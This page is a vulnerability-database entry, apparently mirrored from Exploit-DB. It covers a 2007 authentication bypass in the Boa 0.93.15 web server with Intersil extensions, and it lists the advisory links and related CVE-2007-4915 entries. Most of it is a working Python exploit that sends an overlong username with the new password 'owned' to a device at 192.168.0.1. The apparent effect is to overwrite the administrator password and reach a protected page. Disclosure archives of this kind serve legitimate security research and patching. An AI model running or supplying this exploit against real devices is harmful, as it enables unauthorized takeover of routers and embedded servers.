Lucene search
IkkiEDB-ID:4542HistoryOct 16, 2007 - 12:00 a.m.
Boa 0.93.15 - HTTP Basic Authentication Bypass
2007-10-1600:00:00
ikki
www.exploit-db.com
80
AI Score
7.4
Confidence
Low
/*
* Boa HTTP Basic Authentication Bypass
* Vuln: Boa/0.93.15 (with Intersil Extensions)
*
* Original Advisory:
* http://www.securityfocus.com/archive/1/479434
* http://www.ikkisoft.com/stuff/SN-2007-02.txt
*
* Luca "ikki" Carettoni
* http://www.ikkisoft.com
*/
----
#!/usr/bin/env python
import urllib2
SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME
= 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)',
SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD);
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
res = urllib2.urlopen('http://'+SERVER_IP_ADDRESS+'/home/index.shtml')
# milw0rm.com [2007-10-16]Related
cvelist
cvelist
CVE-2007-4915
2007-09-17 17:00:00
metasploit
metasploit
Intersil (Boa) HTTPd Basic Authentication Password Reset
2012-06-17 02:14:57
prion
prion
Cross site request forgery (csrf)
2007-09-17 17:17:00
nvd
nvd
CVE-2007-4915
2007-09-17 17:17:00
cve
cve
CVE-2007-4915
2007-09-17 17:17:00
exploitdb
exploitdb
Boa 0.93.15 - Administrator Password Overwrite Authentication Bypass
2007-09-14 00:00:00
packetstorm
packetstorm
Intersil (Boa) HTTPd Basic Authentication Password Reset
2024-08-31 00:00:00